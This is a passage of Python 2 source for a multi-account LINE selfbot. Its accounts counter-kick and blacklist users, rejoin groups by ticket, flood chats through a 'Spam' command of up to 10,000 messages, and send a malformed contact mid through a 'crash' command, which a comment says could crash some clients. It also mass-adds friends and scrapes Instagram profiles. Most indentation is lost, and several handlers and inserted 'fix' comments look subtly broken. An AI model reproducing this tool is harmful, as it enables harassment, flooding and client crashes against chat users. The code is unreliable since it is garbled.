random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(DEF).updateGroup(G)
Ticket = random.choice(DEF).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(DEF).updateGroup(G)
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
#-----------------------------------------------
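# NOTE: If any bot is kicked by a non-bot, the block below counter-kicks,
# reopens the group ticket, re-admits the whole squad one client at a time,
# and locks the ticket again.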
if op.type == 19:
    if op.param2 not in Bots and op.param3 in Bots:
        squad = [ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]
        try:
            cl.kickoutFromGroup(op.param1,[op.param2])
            G = cl.getGroup(op.param1)
            G.preventJoinByTicket = False
            cl.updateGroup(G)
            Ticket = cl.reissueGroupTicket(op.param1)
            # cl is still in the group, so only the other accounts rejoin.
            for c in squad:
                c.acceptGroupInvitationByTicket(op.param1,Ticket)
                time.sleep(0.001)
            G = cl.getGroup(op.param1)
            G.preventJoinByTicket = True
            cl.updateGroup(G)
            wait["blacklist"][op.param2] = True
        except:
            random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
            G = random.choice(KAC).getGroup(op.param1)
            G.preventJoinByTicket = False
            random.choice(KAC).updateGroup(G)
            Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
            # In the fallback path cl rejoins as well.
            for c in [cl] + squad:
                c.acceptGroupInvitationByTicket(op.param1,Ticket)
                time.sleep(0.001)
            G = random.choice(KAC).getGroup(op.param1)
            G.preventJoinByTicket = True
            random.choice(KAC).updateGroup(G)
            wait["blacklist"][op.param2] = True
#--------------------------------
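# NOTE: op.type 22 and 24 are room events; with leaveRoom enabled the main
# client quietly leaves any room it is pulled into.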
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
    # Auto-like own timeline posts. The original called msg.contentMetadata
    # like a function, which would raise; build the post URL directly so the
    # slices below still extract the mid and the post id.
    url = "line://home/post?userMid=" + mid + "&postId=" + "new_post"
    cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
ks.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
ks.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","mimin"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
#---------------------
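# NOTE: op.type 17/15 below greet members who join and taunt members who
# leave, using a random client from KAC.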
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "|============================|\n Selamat Datang Di " + str(ginfo.name) + "\n|============================|\n" + " Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName + "\n|============================|\n" + " ??Semoga Betah Kak ?? \n|============================|\n No Baper,No nakal,No Ngeyel ya..!! \n|============================|")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "|============================|\n Baper Tuh Orang :v \n|============================|\n Belum di Anu Kayanya ?? \n|============================|")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
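# NOTE: The two op.type 26 handlers below implement invite-by-contact: after
# "Invite:on", an admin shares a contact card and the bot invites that mid,
# skipping members already present and anyone on the blacklist.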
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n?Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n?" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite2"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = random.choice(KAC).getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
random.choice(KAC).sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
random.choice(KAC).sendText(msg.to,"Sorry, " + _name + " On Blacklist")
random.choice(KAC).sendText(msg.to,"Call my owner to use command !, \n?Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
random.choice(KAC).findAndAddContactsByMid(target)
random.choice(KAC).inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Selesai di Invite : \n?" + _name)
wait["winvite2"] = False
break
except:
try:
random.choice(KAC).findAndAddContactsByMid(invite)
random.choice(KAC).inviteIntoGroup(op.param1,[invite])
wait["winvite2"] = False
except:
random.choice(KAC).sendText(msg.to,"Error Boss, di tunggu beberapa saat lagi boss")
wait["winvite2"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
# Only one member list is needed; the original re-fetched the group from
# every client and kept just the last result.
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
    cl.sendText(msg.to,"Command denied.")
    cl.sendText(msg.to,"Only the Owner can use this command.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
    cl.sendText(msg.to,"Command denied.")
    cl.sendText(msg.to,"Only the Owner can use this command.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin ? t?a? c????-a??? ??t ?||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
# Every account adds the target as a friend.
for c in [cl, ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]:
    c.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
    cl.sendText(msg.to,"Command denied.")
    cl.sendText(msg.to,"Only the Owner can use this command.")
#-------------=SC AllBio=---------------- Change every bot's bio. Format => Allbio: WHATEVER YOU LIKE :D
elif "Allbio:" in msg.text:
    if msg.from_ in owner:
        string = msg.text.replace("Allbio:","")
        if len(string.decode('utf-8')) <= 500:
            # One loop updates the status message on all 25 accounts.
            for c in [cl, ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]:
                profile = c.getProfile()
                profile.statusMessage = string
                c.updateProfile(profile)
        cl.sendText(msg.to,"Bio changed to " + string)
#--------------=Finish=----------------
#--------------= SC Change Owner Name =--------------
elif "Myname:" in msg.text:
    if msg.from_ in owner:
        string = msg.text.replace("Myname:","")
        if len(string.decode('utf-8')) <= 20:
            # One loop renames all 25 accounts; each confirms in chat.
            for c in [cl, ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]:
                profile = c.getProfile()
                profile.displayName = string
                c.updateProfile(profile)
                c.sendText(msg.to,"Name updated to : " + string)
#-------------- copy profile----------
elif "Spam " in msg.text:
if msg.from_ in admin or msg.from_ in owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
# Keke is pretty <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Done=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
k6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Kmid}
k7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Lmid}
k8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Mmid}
k9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Nmid}
k10.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Omid}
k11.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Pmid}
k12.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Qmid}
k13.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Rmid}
k14.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Smid}
k15.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Tmid}
k16.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Umid}
k17.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Vmid}
k18.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Wmid}
k19.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Xmid}
k20.sendMessage(msg)
#====================================================
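# NOTE: The "crash" command below deliberately sends a malformed contact mid
# (note the stray quote and comma in the string); some old LINE clients
# reportedly choked on such payloads. Left as-is on purpose.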
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u6b34b703cbc5fc83cd1e5b6832a05352',"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
    cl.sendText(msg.to,"Command denied.")
    cl.sendText(msg.to,"Only Admins can use this command.")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
    cl.sendText(msg.to,"Command denied.")
    cl.sendText(msg.to,"Only Admins can use this command.")
elif "jointicket " in msg.text.lower():
rplace = msg.text.lower().replace("jointicket ","")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
k4.sendText(msg.to,Hmid)
k5.sendText(msg.to,Imid)
k6.sendText(msg.to,Jmid)
k7.sendText(msg.to,Kmid)
k8.sendText(msg.to,Lmid)
k9.sendText(msg.to,Mmid)
k10.sendText(msg.to,Nmid)
k11.sendText(msg.to,Omid)
k12.sendText(msg.to,Pmid)
k13.sendText(msg.to,Qmid)
k14.sendText(msg.to,Rmid)
k15.sendText(msg.to,Smid)
k16.sendText(msg.to,Tmid)
k17.sendText(msg.to,Umid)
k18.sendText(msg.to,Vmid)
k19.sendText(msg.to,Wmid)
k20.sendText(msg.to,Xmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() == "gift":
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
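# The sticker shortcuts below work the same way: contentType 7 is a sticker
# message, and STKID/STKPKGID/STKVER pick the sticker, its package, and the
# package version. The incoming msg object is mutated and resent.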
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
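# The Lyric handler queries a third-party joox lyrics API and relays the
# title plus lyrics; urllib.urlencode (Python 2) builds the query string.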
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'aq restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
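# The Instagram handler scrapes the public profile page and reads the
# og:description / og:image meta tags with BeautifulSoup. Follower, following
# and post counts are sliced positionally out of the description text, so any
# change to Instagram's page layout would break this parsing.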
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
